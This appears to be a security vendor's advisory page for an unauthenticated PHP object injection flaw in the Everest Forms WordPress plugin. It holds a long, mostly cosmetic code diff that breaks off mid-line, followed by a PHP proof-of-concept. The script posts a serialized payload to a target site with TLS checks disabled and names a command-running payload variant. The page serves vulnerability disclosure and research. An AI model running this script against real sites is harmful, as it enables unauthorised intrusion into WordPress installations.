 		everest_forms_panel_field(
 			'text',
 			'settings',
 			'submit_button_text',
 			$this->form_data,
-			esc_html__('Submit button text', 'everest-forms'),
+			esc_html__( 'Submit button text', 'everest-forms' ),
 			array(
-				'default' => isset($settings['submit_button_text']) ? $settings['submit_button_text'] : __('Submit', 'everest-forms'),
-				'tooltip' => esc_html__('Enter desired text for submit button.', 'everest-forms'),
+				'default' => isset( $settings['submit_button_text'] ) ? $settings['submit_button_text'] : __( 'Submit', 'everest-forms' ),
+				'tooltip' => esc_html__( 'Enter desired text for submit button.', 'everest-forms' ),
 			)
 		);
 		everest_forms_panel_field(
@@ -310,10 +309,10 @@
 			'settings',
 			'submit_button_processing_text',
 			$this->form_data,
-			__('Submit button processing text', 'everest-forms'),
+			__( 'Submit button processing text', 'everest-forms' ),
 			array(
-				'default' => isset($settings['submit_button_processing_text']) ? $settings['submit_button_processing_text'] : __('Processing…', 'everest-forms'),
-				'tooltip' => esc_html__('Enter the submit button text that you would like the button to display while the form submission is processing.', 'everest-forms'),
+				'default' => isset( $settings['submit_button_processing_text'] ) ? $settings['submit_button_processing_text'] : __( 'Processing…', 'everest-forms' ),
+				'tooltip' => esc_html__( 'Enter the submit button text that you would like the button to display while the form submission is processing.', 'everest-forms' ),
 			)
 		);
 		everest_forms_panel_field(
@@ -321,24 +320,25 @@
 			'settings',
 			'submit_button_class',
 			$this->form_data,
-			esc_html__('Submit button class', 'everest-forms'),
+			esc_html__( 'Submit button class', 'everest-forms' ),
 			array(
-				'default' => isset($settings['submit_button_class']) ? $settings['submit_button_class'] : '',
-				'tooltip' => esc_html__('Enter CSS class names for submit button. Multiple class names should be separated with spaces.', 'everest-forms'),
+				'default' => isset( $settings['submit_button_class'] ) ? $settings['submit_button_class'] : '',
+				'tooltip' => esc_html__( 'Enter CSS class names for submit button. Multiple class names should be separated with spaces.', 'everest-forms' ),
 			)
 		);
-		do_action('everest_forms_inline_submit_settings', $this, 'submit', 'connection_1');
+		do_action( 'everest_forms_inline_submit_settings', $this, 'submit', 'connection_1' );
 		echo '</div>';
-		do_action('everest_forms_inline_integrations_settings', $this->form_data, $settings);
+		do_action( 'everest_forms_inline_integrations_settings', $this->form_data, $settings );
+			echo '<div class="everest-forms-border-container"><h4 class="everest-forms-border-container-title">' . esc_html__( 'Advanced', 'everest-forms' ) . '</h4>';
 		everest_forms_panel_field(
 			'toggle',
 			'settings',
 			'ajax_form_submission',
 			$this->form_data,
-			esc_html__('Enable Ajax Form Submission', 'everest-forms'),
+			esc_html__( 'Enable Ajax Form Submission', 'everest-forms' ),
 			array(
-				'default' => isset($settings['ajax_form_submission']) ? $settings['ajax_form_submission'] : 0,
-				'tooltip' => esc_html__('Enables form submission without reloading the page.', 'everest-forms'),
+				'default' => isset( $settings['ajax_form_submission'] ) ? $settings['ajax_form_submission'] : 0,
+				'tooltip' => esc_html__( 'Enables form submission without reloading the page.', 'everest-forms' ),
 			)
 		);
 		everest_forms_panel_field(
@@ -346,79 +346,80 @@
 			'settings',
 			'disabled_entries',
 			$this->form_data,
-			esc_html__('Disable storing entry information', 'everest-forms'),
+			esc_html__( 'Disable storing entry information', 'everest-forms' ),
 			array(
-				'default' => isset($settings['disabled_entries']) ? $settings['disabled_entries'] : 0,
+				'default' => isset( $settings['disabled_entries'] ) ? $settings['disabled_entries'] : 0,
 				/* translators: %1$s - general settings docs url */
-				'tooltip' => sprintf(esc_html__('Disable storing form entries. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/general-settings/#13-toc-title')),
+				'tooltip' => sprintf( esc_html__( 'Disable storing form entries. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/general-settings/#13-toc-title' ) ),
 			)
 		);
+		do_action( 'everest_forms_inline_advance_settings', $this );
+		echo '</div>';

-
-		do_action('everest_forms_inline_general_settings', $this);
+		do_action( 'everest_forms_inline_general_settings', $this );

 		echo '</div>';

 		// --------------------------------------------------------------------//
 		// Email
 		// --------------------------------------------------------------------//
-		$form_name = isset($settings['form_title']) ? ' - ' . $settings['form_title'] : '';
-		if (! isset($settings['email']['connection_1'])) {
-			$settings['email']['connection_1']                   = array('connection_name' => __('Admin Notification', 'everest-forms'));
-			$settings['email']['connection_1']['evf_to_email']   = isset($settings['email']['evf_to_email']) ? $settings['email']['evf_to_email'] : '{admin_email}';
-			$settings['email']['connection_1']['evf_from_name']  = isset($settings['email']['evf_from_name']) ? $settings['email']['evf_from_name'] : get_bloginfo('name', 'display');
-			$settings['email']['connection_1']['evf_from_email'] = isset($settings['email']['evf_from_email']) ? $settings['email']['evf_from_email'] : '{admin_email}';
-			$settings['email']['connection_1']['evf_reply_to']   = isset($settings['email']['evf_reply_to']) ? $settings['email']['evf_reply_to'] : '';
+		$form_name = isset( $settings['form_title'] ) ? ' - ' . $settings['form_title'] : '';
+		if ( ! isset( $settings['email']['connection_1'] ) ) {
+			$settings['email']['connection_1']                   = array( 'connection_name' => __( 'Admin Notification', 'everest-forms' ) );
+			$settings['email']['connection_1']['evf_to_email']   = isset( $settings['email']['evf_to_email'] ) ? $settings['email']['evf_to_email'] : '{admin_email}';
+			$settings['email']['connection_1']['evf_from_name']  = isset( $settings['email']['evf_from_name'] ) ? $settings['email']['evf_from_name'] : get_bloginfo( 'name', 'display' );
+			$settings['email']['connection_1']['evf_from_email'] = isset( $settings['email']['evf_from_email'] ) ? $settings['email']['evf_from_email'] : '{admin_email}';
+			$settings['email']['connection_1']['evf_reply_to']   = isset( $settings['email']['evf_reply_to'] ) ? $settings['email']['evf_reply_to'] : '';
 			/* translators: %s: Form Name */
-			$settings['email']['connection_1']['evf_email_subject'] = isset($settings['email']['evf_email_subject']) ? $settings['email']['evf_email_subject'] : sprintf(esc_html__('New Form Entry %s', 'everest-forms'), $form_name);
-			$settings['email']['connection_1']['evf_email_message'] = isset($settings['email']['evf_email_message']) ? $settings['email']['evf_email_message'] : '{all_fields}';
+			$settings['email']['connection_1']['evf_email_subject'] = isset( $settings['email']['evf_email_subject'] ) ? $settings['email']['evf_email_subject'] : sprintf( esc_html__( 'New Form Entry %s', 'everest-forms' ), $form_name );
+			$settings['email']['connection_1']['evf_email_message'] = isset( $settings['email']['evf_email_message'] ) ? $settings['email']['evf_email_message'] : '{all_fields}';

-			$email_settings = array('attach_pdf_to_admin_email', 'show_header_in_attachment_pdf_file', 'conditional_logic_status', 'conditional_option', 'conditionals');
-			foreach ($email_settings as $email_setting) {
-				$settings['email']['connection_1'][$email_setting] = isset($settings['email'][$email_setting]) ? $settings['email'][$email_setting] : '';
+			$email_settings = array( 'attach_pdf_to_admin_email', 'show_header_in_attachment_pdf_file', 'conditional_logic_status', 'conditional_option', 'conditionals' );
+			foreach ( $email_settings as $email_setting ) {
+				$settings['email']['connection_1'][ $email_setting ] = isset( $settings['email'][ $email_setting ] ) ? $settings['email'][ $email_setting ] : '';
 			}

 			// Backward compatibility.
-			$unique_connection_id = sprintf('connection_%s', uniqid());
-			if (isset($settings['email']['evf_send_confirmation_email']) && '1' === $settings['email']['evf_send_confirmation_email']) {
-				$settings['email'][$unique_connection_id] = array('connection_name' => esc_html__('User Notification', 'everest-forms'));
+			$unique_connection_id = sprintf( 'connection_%s', uniqid() );
+			if ( isset( $settings['email']['evf_send_confirmation_email'] ) && '1' === $settings['email']['evf_send_confirmation_email'] ) {
+				$settings['email'][ $unique_connection_id ] = array( 'connection_name' => esc_html__( 'User Notification', 'everest-forms' ) );

-				foreach ($email_settings as $email_setting) {
-					$settings['email'][$unique_connection_id][$email_setting] = isset($settings['email'][$email_setting]) ? $settings['email'][$email_setting] : '';
+				foreach ( $email_settings as $email_setting ) {
+					$settings['email'][ $unique_connection_id ][ $email_setting ] = isset( $settings['email'][ $email_setting ] ) ? $settings['email'][ $email_setting ] : '';
 				}
 			}
 		}

 		echo "<div class = 'evf-email-settings-wrapper'>";

-		foreach ($settings['email'] as $connection_id => $connection) :
-			if (preg_match('/connection_/', $connection_id)) {
+		foreach ( $settings['email'] as $connection_id => $connection ) :
+			if ( preg_match( '/connection_/', $connection_id ) ) {
 				// Backward Compatibility.
-				if (isset($settings['email']['enable_email_notification']) && '0' === $settings['email']['enable_email_notification']) {
-					$email_status = isset($settings['email']['enable_email_notification']) ? $settings['email']['enable_email_notification'] : '1';
+				if ( isset( $settings['email']['enable_email_notification'] ) && '0' === $settings['email']['enable_email_notification'] ) {
+					$email_status = isset( $settings['email']['enable_email_notification'] ) ? $settings['email']['enable_email_notification'] : '1';
 				} else {
-					$email_status = isset($settings['email'][$connection_id]['enable_email_notification']) ? $settings['email'][$connection_id]['enable_email_notification'] : '1';
+					$email_status = isset( $settings['email'][ $connection_id ]['enable_email_notification'] ) ? $settings['email'][ $connection_id ]['enable_email_notification'] : '1';
 				}
 				$hidden_class                = '1' !== $email_status ? 'everest-forms-hidden' : '';
 				$hidden_enable_setting_class = '1' === $email_status ? 'everest-forms-hidden' : '';
-				$toggler_hide_class          = isset($toggler_hide_class) ? 'style=display:none;' : '';
-				echo '<div class="evf-content-section evf-content-email-settings" ' . esc_attr($toggler_hide_class) . '>';
-				echo '<div class="evf-content-section-title" ' . esc_attr($toggler_hide_class) . '>';
-				echo '<div class="evf-title">' . esc_html__('Email', 'everest-forms') . '</div>';
-		?>
-				<div class="evf-enable-email-toggle <?php echo esc_attr($hidden_enable_setting_class); ?>"><img src="<?php echo esc_url(plugin_dir_url(EVF_PLUGIN_FILE) . 'assets/images/enable-email-toggle.png'); ?>" alt="<?php esc_attr_e('Click me to enable email settings', 'everest-forms'); ?>"></div>
+				$toggler_hide_class          = isset( $toggler_hide_class ) ? 'style=display:none;' : '';
+				echo '<div class="evf-content-section evf-content-email-settings" ' . esc_attr( $toggler_hide_class ) . '>';
+				echo '<div class="evf-content-section-title" ' . esc_attr( $toggler_hide_class ) . '>';
+				echo '<div class="evf-title">' . esc_html__( 'Email', 'everest-forms' ) . '</div>';
+				?>
+				<div class="evf-enable-email-toggle <?php echo esc_attr( $hidden_enable_setting_class ); ?>"><img src="<?php echo esc_url( plugin_dir_url( EVF_PLUGIN_FILE ) . 'assets/images/enable-email-toggle.png' ); ?>" alt="<?php esc_attr_e( 'Click me to enable email settings', 'everest-forms' ); ?>"></div>
 				<div class="evf-toggle-section">
 					<label class="evf-toggle-switch">
-						<input type="hidden" name="settings[email][<?php echo esc_attr($connection_id); ?>][enable_email_notification]" value="0" class="widefat">
-						<input type="checkbox" name="settings[email][<?php echo esc_attr($connection_id); ?>][enable_email_notification]" value="1" data-connection-id="<?php echo esc_attr($connection_id); ?>" <?php echo checked('1', $email_status, false); ?>>
+						<input type="hidden" name="settings[email][<?php echo esc_attr( $connection_id ); ?>][enable_email_notification]" value="0" class="widefat">
+						<input type="checkbox" name="settings[email][<?php echo esc_attr( $connection_id ); ?>][enable_email_notification]" value="1" data-connection-id="<?php echo esc_attr( $connection_id ); ?>" <?php echo checked( '1', $email_status, false ); ?>>
 						<span class="evf-toggle-switch-wrap"></span>
 						<span class="evf-toggle-switch-control"></span>
 					</label>
 				</div>
 				</div>
-		<?php
+				<?php

-				echo '<div class="evf-content-email-settings-inner ' . esc_attr($hidden_class) . '" data-connection_id=' . esc_attr($connection_id) . '>';
+				echo '<div class="evf-content-email-settings-inner ' . esc_attr( $hidden_class ) . '" data-connection_id=' . esc_attr( $connection_id ) . '>';

 				everest_forms_panel_field(
 					'text',
@@ -427,7 +428,7 @@
 					$this->form_data,
 					'',
 					array(
-						'default'    => isset($settings['email'][$connection_id]['connection_name']) ? $settings['email'][$connection_id]['connection_name'] : __('Admin Notification', 'everest-forms'),
+						'default'    => isset( $settings['email'][ $connection_id ]['connection_name'] ) ? $settings['email'][ $connection_id ]['connection_name'] : __( 'Admin Notification', 'everest-forms' ),
 						'class'      => 'everest-forms-email-name',
 						'parent'     => 'settings',
 						'subsection' => $connection_id,
@@ -439,11 +440,11 @@
 					'email',
 					'evf_to_email',
 					$this->form_data,
-					esc_html__('To Address', 'everest-forms'),
+					esc_html__( 'To Address', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_to_email']) ? $settings['email'][$connection_id]['evf_to_email'] : '{admin_email}',
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_to_email'] ) ? $settings['email'][ $connection_id ]['evf_to_email'] : '{admin_email}',
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the recipient's email address (comma separated) to receive form entry notifications. <a href="%s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#1-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the recipient's email address (comma separated) to receive form entry notifications. <a href="%s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#1-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'fields',
 							'form_fields' => 'email',
@@ -452,16 +453,16 @@
 						'subsection' => $connection_id,
 					)
 				);
-				if ('yes' === get_option('everest_forms_enable_email_copies')) {
+				if ( 'yes' === get_option( 'everest_forms_enable_email_copies' ) ) {
 					everest_forms_panel_field(
 						'text',
 						'email',
 						'evf_carboncopy',
 						$this->form_data,
-						esc_html__('Cc Address', 'everest-forms'),
+						esc_html__( 'Cc Address', 'everest-forms' ),
 						array(
-							'default'    => isset($settings['email'][$connection_id]['evf_carboncopy']) ? $settings['email'][$connection_id]['evf_carboncopy'] : '',
-							'tooltip'    => esc_html__('Enter Cc recipient's email address (comma separated) to receive form entry notifications.', 'everest-forms'),
+							'default'    => isset( $settings['email'][ $connection_id ]['evf_carboncopy'] ) ? $settings['email'][ $connection_id ]['evf_carboncopy'] : '',
+							'tooltip'    => esc_html__( 'Enter Cc recipient's email address (comma separated) to receive form entry notifications.', 'everest-forms' ),
 							'smarttags'  => array(
 								'type'        => 'fields',
 								'form_fields' => 'email',
@@ -475,10 +476,10 @@
 						'email',
 						'evf_blindcarboncopy',
 						$this->form_data,
-						esc_html__('Bcc Address', 'everest-forms'),
+						esc_html__( 'Bcc Address', 'everest-forms' ),
 						array(
-							'default'    => isset($settings['email'][$connection_id]['evf_blindcarboncopy']) ? $settings['email'][$connection_id]['evf_blindcarboncopy'] : '',
-							'tooltip'    => esc_html__('Enter Bcc recipient's email address (comma separated) to receive form entry notifications.', 'everest-forms'),
+							'default'    => isset( $settings['email'][ $connection_id ]['evf_blindcarboncopy'] ) ? $settings['email'][ $connection_id ]['evf_blindcarboncopy'] : '',
+							'tooltip'    => esc_html__( 'Enter Bcc recipient's email address (comma separated) to receive form entry notifications.', 'everest-forms' ),
 							'smarttags'  => array(
 								'type'        => 'fields',
 								'form_fields' => 'email',
@@ -493,11 +494,11 @@
 					'email',
 					'evf_from_name',
 					$this->form_data,
-					esc_html__('From Name', 'everest-forms'),
+					esc_html__( 'From Name', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_from_name']) ? $settings['email'][$connection_id]['evf_from_name'] : get_bloginfo('name', 'display'),
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_from_name'] ) ? $settings['email'][ $connection_id ]['evf_from_name'] : get_bloginfo( 'name', 'display' ),
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the From Name to be displayed in Email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#2-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the From Name to be displayed in Email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#2-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'all',
 							'form_fields' => 'all',
@@ -511,11 +512,11 @@
 					'email',
 					'evf_from_email',
 					$this->form_data,
-					esc_html__('From Address', 'everest-forms'),
+					esc_html__( 'From Address', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_from_email']) ? $settings['email'][$connection_id]['evf_from_email'] : '{admin_email}',
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_from_email'] ) ? $settings['email'][ $connection_id ]['evf_from_email'] : '{admin_email}',
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the Email address from which you want to send Email. <a href="%s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#3-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the Email address from which you want to send Email. <a href="%s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#3-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'fields',
 							'form_fields' => 'email',
@@ -529,11 +530,11 @@
 					'email',
 					'evf_reply_to',
 					$this->form_data,
-					esc_html__('Reply To', 'everest-forms'),
+					esc_html__( 'Reply To', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_reply_to']) ? $settings['email'][$connection_id]['evf_reply_to'] : '',
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_reply_to'] ) ? $settings['email'][ $connection_id ]['evf_reply_to'] : '',
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the reply to email address where you want the email to be received when this email is replied. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#4-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the reply to email address where you want the email to be received when this email is replied. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#4-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'fields',
 							'form_fields' => 'email',
@@ -547,12 +548,12 @@
 					'email',
 					'evf_email_subject',
 					$this->form_data,
-					esc_html__('Email Subject', 'everest-forms'),
+					esc_html__( 'Email Subject', 'everest-forms' ),
 					array(
 						/* translators: %s: Form Name */
-						'default'    => isset($settings['email'][$connection_id]['evf_email_subject']) ? $settings['email'][$connection_id]['evf_email_subject'] : sprintf(esc_html__('New Form Entry %s', 'everest-forms'), $form_name),
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_email_subject'] ) ? $settings['email'][ $connection_id ]['evf_email_subject'] : sprintf( esc_html__( 'New Form Entry %s', 'everest-forms' ), $form_name ),
 						/* translators: %1$s - General Settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the subject of the email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#5-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the subject of the email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#5-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'all',
 							'form_fields' => 'all',
@@ -564,19 +565,19 @@
 				// --------------------------------------------------------------------//
 				// Everest Forms AI Setting Section Start
 				// --------------------------------------------------------------------//
-				$everest_forms_ai_api_key = get_option('everest_forms_ai_api_key');
-				if (! empty($everest_forms_ai_api_key)) {
+				$everest_forms_ai_api_key = get_option( 'everest_forms_ai_api_key' );
+				if ( ! empty( $everest_forms_ai_api_key ) ) {
 					everest_forms_panel_field(
 						'toggle',
 						'email',
 						'enable_ai_email_prompt',
 						$this->form_data,
-						esc_html__('Enable Email Prompt', 'everest-forms'),
+						esc_html__( 'Enable Email Prompt', 'everest-forms' ),
 						array(
-							'default'    => ! empty($settings['email'][$connection_id]['enable_ai_email_prompt']) ? $settings['email'][$connection_id]['enable_ai_email_prompt'] : '0',
+							'default'    => ! empty( $settings['email'][ $connection_id ]['enable_ai_email_prompt'] ) ? $settings['email'][ $connection_id ]['enable_ai_email_prompt'] : '0',
 							'class'      => 'everest-forms-enable-email-prompt',
 							/* translators: %1$s - email message prompt doc url*/
-							'tooltip'    => sprintf(esc_html__('Check this option to enable the email message prompt. <a href="%s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/ai/#6-toc-title')),
+							'tooltip'    => sprintf( esc_html__( 'Check this option to enable the email message prompt. <a href="%s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/ai/#6-toc-title' ) ),
 							'parent'     => 'settings',
 							'subsection' => $connection_id,
 						)
@@ -586,12 +587,12 @@
 						'email',
 						'evf_email_message_prompt',
 						$this->form_data,
-						esc_html__('Email Message Prompt', 'everest-forms'),
+						esc_html__( 'Email Message Prompt', 'everest-forms' ),
 						array(
-							'default'    => isset($settings['email'][$connection_id]['evf_email_message_prompt']) ? $settings['email'][$connection_id]['evf_email_message_prompt'] : '',
-							'class'      => isset($settings['email'][$connection_id]['enable_ai_email_prompt']) && '1' === $settings['email'][$connection_id]['enable_ai_email_prompt'] ? 'evf-email-message-prompt' : 'evf-email-message-prompt everest-forms-hidden',
+							'default'    => isset( $settings['email'][ $connection_id ]['evf_email_message_prompt'] ) ? $settings['email'][ $connection_id ]['evf_email_message_prompt'] : '',
+							'class'      => isset( $settings['email'][ $connection_id ]['enable_ai_email_prompt'] ) && '1' === $settings['email'][ $connection_id ]['enable_ai_email_prompt'] ? 'evf-email-message-prompt' : 'evf-email-message-prompt everest-forms-hidden',
 							/* translators: %1$s - general settings docs url */
-							'tooltip'    => sprintf(esc_html__('Enter the email message prompt. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/ai/#6-toc-title')),
+							'tooltip'    => sprintf( esc_html__( 'Enter the email message prompt. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/ai/#6-toc-title' ) ),
 							'smarttags'  => array(
 								'type'        => 'all',
 								'form_fields' => 'all',
@@ -609,11 +610,11 @@
 					'email',
 					'evf_email_message',
 					$this->form_data,
-					esc_html__('Email Message', 'everest-forms'),
+					esc_html__( 'Email Message', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_email_message']) ? evf_string_translation($this->form_data['id'], 'evf_email_message', $settings['email'][$connection_id]['evf_email_message']) : __('{all_fields}', 'everest-forms'),
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_email_message'] ) ? evf_string_translation( $this->form_data['id'], 'evf_email_message', $settings['email'][ $connection_id ]['evf_email_message'] ) : __( '{all_fields}', 'everest-forms' ),
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the message of the email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#6-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the message of the email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#6-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'all',
 							'form_fields' => 'all',
@@ -621,11 +622,11 @@
 						'parent'     => 'settings',
 						'subsection' => $connection_id,
 						/* translators: %s - all fields smart tag. */
-						'after'      => empty($everest_forms_ai_api_key) ? '<p class="desc">' . sprintf(esc_html__('To display all form fields, use the %s Smart Tag.', 'everest-forms'), '<code>{all_fields}</code>') . '</p>' : '<p class="desc">' . sprintf(esc_html__('To display all form fields, use the %1$s Smart Tag. Use %2$s Smart Tag for AI-generated emails', 'everest-forms'), '<code>{all_fields}</code>', '<code>{ai_email_response}</code>') . '</p>',
+						'after'      => empty( $everest_forms_ai_api_key ) ? '<p class="desc">' . sprintf( esc_html__( 'To display all form fields, use the %s Smart Tag.', 'everest-forms' ), '<code>{all_fields}</code>' ) . '</p>' : '<p class="desc">' . sprintf( esc_html__( 'To display all form fields, use the %1$s Smart Tag. Use %2$s Smart Tag for AI-generated emails', 'everest-forms' ), '<code>{all_fields}</code>', '<code>{ai_email_response}</code>' ) . '</p>',
 					)
 				);

-				do_action('everest_forms_inline_email_settings', $this, $connection_id);
+				do_action( 'everest_forms_inline_email_settings', $this, $connection_id );

 				echo '</div></div>';
 			}
@@ -642,28 +643,28 @@
 		 *
 		 * @since 3.4.0
 		 */
-		$this->form_data = evf_form_confirmation_backward_compatibility($this->form_data);
+		$this->form_data = evf_form_confirmation_backward_compatibility( $this->form_data );

 		echo '<div class="evf-content-section evf-content-confirmation-settings">';
 		echo '<h3 class="evf-content-section-title">';
-		esc_html_e('Form Confirmation', 'everest-forms');
+		esc_html_e( 'Form Confirmation', 'everest-forms' );
 		echo '</h3>';
 		echo '<div class="evf-confirmation-wrap everest-forms-border-container">';
 		echo '<h4 class="evf-content-section-title">';
-		esc_html_e('Confirmation Settings', 'everest-forms');
+		esc_html_e( 'Confirmation Settings', 'everest-forms' );
 		echo '</h4>';

-		$confirmation_type = isset($this->form_data['settings']['redirect_to']) ? $this->form_data['settings']['redirect_to'] : 'same';
-		$confirmation_type = '0' === (string)$confirmation_type ? 'same' : $confirmation_type;
+		$confirmation_type = isset( $this->form_data['settings']['redirect_to'] ) ? $this->form_data['settings']['redirect_to'] : 'same';
+		$confirmation_type = '0' === (string) $confirmation_type ? 'same' : $confirmation_type;

 		?>
 		<div id="everest-forms-panel-field-settings-redirect_to-wrap" class="everest-forms-panel-field evf-builder-radio  everest-forms-panel-field-radio">
-			<label for="everest-forms-panel-field-settings-redirect_to"><?php echo __('Confirmation Type', 'everest-forms'); ?>
-				<i title="<?php echo __('Choose the confirmation type', 'everest-forms'); ?>" class="dashicons dashicons-editor-help everest-forms-help-tooltip"></i>
+			<label for="everest-forms-panel-field-settings-redirect_to"><?php echo __( 'Confirmation Type', 'everest-forms' ); ?>
+				<i title="<?php echo __( 'Cho

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3296 - Everest Forms <= 3.4.3 - Unauthenticated PHP Object Injection via Form Entry Metadata

<?php
/**
 * Everest Forms PHP Object Injection Proof of Concept
 * Targets: Everest Forms <= 3.4.3
 * Method: Unauthenticated form submission with serialized payload
 * Result: Arbitrary PHP code execution when admin views entries
 */

$target_url = 'https://vulnerable-site.com/'; // CHANGE THIS
$form_id = 1; // CHANGE THIS - target form ID

// Create a serialized PHP object payload
// This example uses a generic object injection chain
$payload = 'O:8:"stdClass":1:{s:4:"test";s:10:"INJECTION";}';

// Alternative: More dangerous payload using known POP chains
// $payload = 'O:20:"PHPSerializedPayload":1:{s:13:"command";s:10:"whoami";}';

// Prepare form submission data
$post_data = array(
    'everest_forms' => array(
        'form_id' => $form_id,
        'fields' => array(
            '1' => $payload // Inject into first form field
        )
    ),
    'everest_forms_id' => $form_id,
    'action' => 'everest_forms_submit'
);

// Initialize cURL
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'User-Agent: Atomic-Edge-PoC/1.0'
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code == 200) {
    echo "[+] Payload submitted successfullyn";
    echo "[+] The payload is now stored in the databasen";
    echo "[+] When an administrator views form entries, the payload will executen";
    echo "[+] Check: " . $target_url . "wp-admin/admin.php?page=evf-entriesn";
} else {
    echo "[-] Submission failed with HTTP code: " . $http_code . "n";
    echo "[-] Response: " . substr($response, 0, 500) . "n";
}

// Clean up
curl_close($ch);

// Note: Actual exploitation requires a valid PHP object injection chain
// This PoC demonstrates the injection vector only
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School